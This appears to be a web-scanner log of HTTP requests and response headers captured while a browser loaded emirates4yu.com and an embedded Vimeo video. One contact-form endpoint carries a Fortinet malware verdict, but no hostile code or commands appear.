151.101.86.109200 OK 19 kB URL HTTP/2 i.vimeocdn.com/video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338
IP 151.101.86.109:0
File type ISO Media, AVIF Image\012- data
Hash 027e10f56a4dca92f7dfbcb901745a51
909f363aabe35f0ee478abaa20ad57516f702e9a
bbf2c682d15b02591ec20a8d95674c7db66e8e7ec784d2287c04daaf8d1d3a38
GET /video/746942421-fb2e650771298bc27cc72cd0572616ddd0b3e167f2383463df2b7f9bfa88b69b-d?mw=600&mh=338 HTTP/1.1
Host: i.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: image/avif
etag: 027e10f56a4dca92f7dfbcb901745a51
x-viewmaster-lossless-format: automatic
viewmaster-server: viewmaster-us-central1-qx4d
cache-control: public, max-age=2592000
via: vvarnish, 1.1 varnish, 1.1 varnish
x-backend-server: varnish
access-control-allow-origin: *
access-control-expose-headers: X-Viewmaster-Status
access-control-max-age: 86400
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
age: 1345069
x-served-by: cache-dfw-kdfw8210095-DFW, cache-bma1680-BMA
x-cache: miss, HIT, HIT
x-cache-hits: 10, 1
x-timer: S1669377722.240359,VS0,VE1
vary: Accept
content-length: 19010
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg
34.120.237.76200 OK 8.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 92c78302bcce1568eb6a5563100b932c
43d1dec7fc06879988c9c3cadd800cc8145df988
0dda9914306c8e3a7ea75eade8e762652d93907dd6c5a8cc81707d6d8098b60a
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7993
x-amzn-requestid: 9f0ff853-4819-47cd-959d-658401ea5748
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCsG5mIAMFqAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-1c48b9223684f2942f8dd42d;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 7YSXUV-LZpsI7vciFhuqt1EVr6YRkhxcOgMg8z8bxLcOE01_baf6Gg==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 1b74ccf4cb51eacf97a0e6d60ae46a3e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:47:53 GMT
age: 51249
etag: "43d1dec7fc06879988c9c3cadd800cc8145df988"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg
34.120.237.76200 OK 8.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 8b6ee13d43732f7c764a49500d092865
5d15fd672e968d59b541e4d5d0d01cd5e69f4075
fc3623d527147e1c6aab399251ed8d527e6eefdee6ad7183f00df2613498bfe4
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 8006
x-amzn-requestid: 78aab013-df11-464b-a1c7-ee41b7e77b40
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cIB-AHSrIAMFvKw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637fe38c-4d795f410a57fc2c21d7075d;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 21:35:08 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: NntLZ3wUdcX9kEo-afFLU0TPKgqAlSK3bToNh2mmoqoyLBJINNk7ow==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 caf6806821bc479b28a6f1ce3043b8a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:54:39 GMT
age: 50843
etag: "5d15fd672e968d59b541e4d5d0d01cd5e69f4075"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg
34.120.237.76200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 481c033b9ffd030ff0de6e35cf788b47
85d3baad9217af2b5d75c019d2ef95dbb919a788
02443c7869914c2b29892deb0c645395bcf4e8379da3cf20974614ff9c92893b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11249
x-amzn-requestid: 8f679d7f-2ea5-4e47-b78d-79af59435a62
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cFPHYHkAIAMFpBg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637ec562-26108a785e910dc3355d58f1;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 01:14:10 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: NKwpIdw2RZNZNh69AF5GNvunA_QfRGClvzcRP3zYwn7c8BLBlt097g==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 07:46:20 GMT
age: 15342
etag: "85d3baad9217af2b5d75c019d2ef95dbb919a788"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg
34.120.237.76200 OK 6.4 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash f6292a2988fb4505d0098553b8e99ddc
9b8aafcda0e22edcc16d3048f4b88659d3b42419
16b7b473229c5e519ab81b385c50277424f3f3b2a5d7647035e84ba58e44f3be
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6385
x-amzn-requestid: 4c2a84f7-f038-4f5a-86c2-5c8ce1a48c6e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cI5NVFMAoAMFn7g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63803bee-45c6411c2430e2375f530dd8;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 03:52:14 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: Fj82i9qJmEiUy2DOkkowq8WRyzupMwNyQqu110sJ3o72HEW4yb7bjQ==
via: 1.1 010c0731b9775a983eceaec0f5fa6a2e.cloudfront.net (CloudFront), 1.1 aef00f14752da9aa504d392fd46eff94.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 07:35:26 GMT
age: 15996
etag: "9b8aafcda0e22edcc16d3048f4b88659d3b42419"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg
34.120.237.76200 OK 4.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 4006a9037ab5f28dca62b0aa7a704c41
74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b
556ae6516a1f272a96569a3637858292731a34e82672b682f6e7442ca68f4b1d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 3955
x-amzn-requestid: 42c8d309-a8d2-47cc-8d97-c7fa3a63f8cd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCM9NGJHoAMF4sQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d8eba-2a06cda9346bd02c46955444;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 03:08:42 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 5MlzpHpq7auKLSAYikINuPAylXI11VJL3xxIJ9Dyub-7rjQaPfg0WQ==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 04:23:00 GMT
age: 27542
etag: "74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/wp-json/contact-form-7/v1/contact-forms/1637/refill
35.190.203.220200 OK 2 B URL HTTP/2 emirates4yu.com/wp-json/contact-form-7/v1/contact-forms/1637/refill
IP 35.190.203.220:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d751713988987e9331980363e24189ce
97d170e1550eee4afc0af065b78cda302a97674c
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
Analyzer Verdict Alert fortinet Malware
GET /wp-json/contact-form-7/v1/contact-forms/1637/refill HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://emirates4yu.com/fr/
Connection: keep-alive
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:02 GMT
content-type: application/json; charset=UTF-8
content-length: 2
x-robots-tag: noindex
link: <https://emirates4yu.com/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
x-powered-by: WP Engine
x-cacheable: SHORT
vary: Accept-Encoding,Cookie
cache-control: max-age=600, must-revalidate
x-cache: HIT: 5
x-cache-group: normal
accept-ranges: bytes
X-Firefox-Spdy: h2
js-agent.newrelic.com/nr-spa-1216.min.js
151.101.86.137200 OK 18 kB URL HTTP/2 js-agent.newrelic.com/nr-spa-1216.min.js
IP 151.101.86.137:0
File type ASCII text, with very long lines (32010)
Hash 6561a2403142205f966207d61576f1a6
1310e72f494e12ab63a4280fc1600a2c89dc9bb8
0e496fcab0b9120938373e271fa6631b7da17adf33f8a490637467c170a3e37a
GET /nr-spa-1216.min.js HTTP/1.1
Host: js-agent.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: TAwVDFAylU9PwNPPW/eXC4UyIMC8EQ1d6JNW9Q+uXGnPmL1fuimq9M3lAe733gCMeKNDiCQX1YM=
x-amz-request-id: SYTECJR5CMD8NJ8E
last-modified: Thu, 14 Apr 2022 16:45:57 GMT
etag: "63e2df852d15ab21d7ff8fc4363222e8"
x-amz-version-id: UU.F5jvoumAjQChriwTQHbisCFw_OInU
content-type: application/javascript
server: AmazonS3
cache-control: public, max-age=7200, stale-if-error=604800
content-encoding: gzip
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
via: 1.1 varnish
x-served-by: cache-bma1629-BMA
x-cache: HIT
x-cache-hits: 662
x-timer: S1669377722.399128,VS0,VE0
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
content-length: 18216
X-Firefox-Spdy: h2
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1
23.36.76.194200 OK 2.4 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
File type JSON data\012- , ASCII text, with very long lines (11037)
Hash 439b1e074744ace95f568541bd77bbf6
d36f76258b023b30231df56fcbbc82cc2592ab1b
0f5270e0a5bf02e5acfe3ddbdc292c34452cc77cf9529555ba3a335c93736b62
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1 HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
origin-retrieved-hour: 1657760400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Content-Encoding: gzip
Content-Length: 2389
Aka-c-hit: cache-hit
Cache-Control: max-age=31535956
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
Vary: Accept-Encoding
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
AK-REFERENCE-ID: 0.be4c2417.1669377722.3242141
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
bam.nr-data.net/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken
162.247.241.14200 OK 77 B URL HTTP/1.1 bam.nr-data.net/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken
IP 162.247.241.14:0
File type ASCII text, with no line terminators
Hash f1442f5831dbbe0210da2d7a4180d6b8
2ade23c6c7a001c66f0c0a9a101ec152747b434e
c6acf9fb2ecc1b144c51bd0337bbf1c26db3df2f649ac2da5c56db20d93eb3ef
GET /1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:02 GMT
Content-Type: text/javascript
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 76fa3baf0e460af6-OSL
Access-Control-Allow-Origin: *
Set-Cookie: JSESSIONID=399bbd57267377d7; Path=/; Domain=.nr-data.net; Secure; SameSite=None
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Cross-Origin-Resource-Policy: cross-origin
Vary: Accept-Encoding
Server: cloudflare
Content-Encoding: gzip
www.google-analytics.com/analytics.js
142.250.74.174200 OK 20 kB URL HTTP/2 www.google-analytics.com/analytics.js
IP 142.250.74.174:0
File type ASCII text, with very long lines (1325)
Hash 47e6f374ca946fddd5b59871b325736c
baa9282efc8785e84d247c3bff518eaa45f101c4
16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
strict-transport-security: max-age=10886400; includeSubDomains; preload
x-content-type-options: nosniff
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 20039
date: Fri, 25 Nov 2022 10:41:08 GMT
expires: Fri, 25 Nov 2022 12:41:08 GMT
cache-control: public, max-age=7200
age: 4854
last-modified: Tue, 27 Sep 2022 22:01:05 GMT
content-type: text/javascript
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash d3d2d21ac304813a16da64921ce18ba4
98b1762c675c61eeb18254986461e6b1074ebc92
af00429c189464ddb8df704dc48035421f943444df6ca17390fb97466c2e7e9b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
